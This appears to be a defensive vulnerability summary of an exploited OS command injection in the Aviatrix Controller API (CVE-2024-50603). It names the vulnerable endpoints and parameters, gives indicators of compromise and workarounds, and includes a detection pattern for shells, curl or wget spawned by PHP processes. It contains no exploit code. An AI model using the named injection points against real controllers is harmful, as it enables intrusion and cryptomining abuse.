Full Report
The vulnerability CVE-2024-50603 was disclosed on 2025-01-07, with a detailed blog and proof-of-concept exploit released by researchers soon after. Evidence of exploitation in cloud environments were observed by Wiz Research, targeting publicly exposed, vulnerable machines. At...
Analysis Summary
# Vulnerability: Aviatrix Controller Command Injection (CVE-2024-50603)
## CVE Details
- CVE ID: CVE-2024-50603
- CVSS Score: Not provided in text, but exploitation strongly implies **High/Critical**.
- CWE: CWE-78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'))
## Affected Systems
- Products: Aviatrix Controller
- Versions: Specific vulnerable versions are not listed in the provided text.
- Configurations: Vulnerable to exploitation when exposed publicly to the internet.
## Vulnerability Description
The vulnerability is an **OS Command Injection** flaw existing in the Aviatrix Controller's API, specifically within the `list_flightpath_destination_instances` and `flightpath_connection_test` endpoints. Improper handling and lack of sanitization of user-supplied parameters such as `cloud_type` and `src_cloud_type` allow an unauthenticated remote attacker to inject and execute arbitrary operating system commands on the underlying controller host.
## Exploitation
- Status: **Exploited in the wild** (Observed by Wiz Research targeting publicly exposed machines).
- Complexity: **Low** (Unauthenticated, remote execution).
- Attack Vector: **Network**
## Impact
- Confidentiality: Potentially compromised (Evidence of backdoor deployment suggests access to configuration/data for exfiltration).
- Integrity: High (Arbitrary command execution allows full system compromise).
- Availability: Risk of degradation/denial due to resource hijacking (Cryptocurrency mining observed).
## Remediation
### Patches
- No specific patch version is mentioned in the provided text. Users must consult the official Aviatrix security advisory released shortly after CVE disclosure (2025-01-07).
### Workarounds
- **Restrict network access:** Immediately limit or block all public internet access to the Aviatrix Controller administration interfaces. Access should be restricted to trusted internal or management networks only.
## Detection
- **Indicators of Compromise (IOCs):**
- Unauthorized execution of cryptocurrency mining software (e.g., XMRig) on the controller host.
- Presence of suspicious persistence mechanisms, such as the Sliver C2 framework implant.
- **Detection Methods and Tools:**
- Monitor controller system logs for unexpected process creation stemming from known API handler execution paths that involve command building (e.g., looking for PHP processes spawning shells or system utilities like `curl`, `wget`, or miners).
- Network monitoring for outbound connections to known C2 infrastructure or cryptocurrency mining pools originating from the controller.
- Use of vulnerability scanning tools (e.g., Nuclei) that may have published templates targeting this specific vulnerability signature.
## References
- Vendor advisories: Consult official Aviatrix security documentation published around January 2025 regarding CVE-2024-50603.
- Relevant links - defanged:
- hxxps://www.securing.pl/en/cve-2024-50603-aviatrix-network-controller-command-injection-vulnerability/
- hxxps://www.wiz.io/blog/wiz-research-identifies-exploitation-in-the-wild-of-aviatrix-cve-2024-50603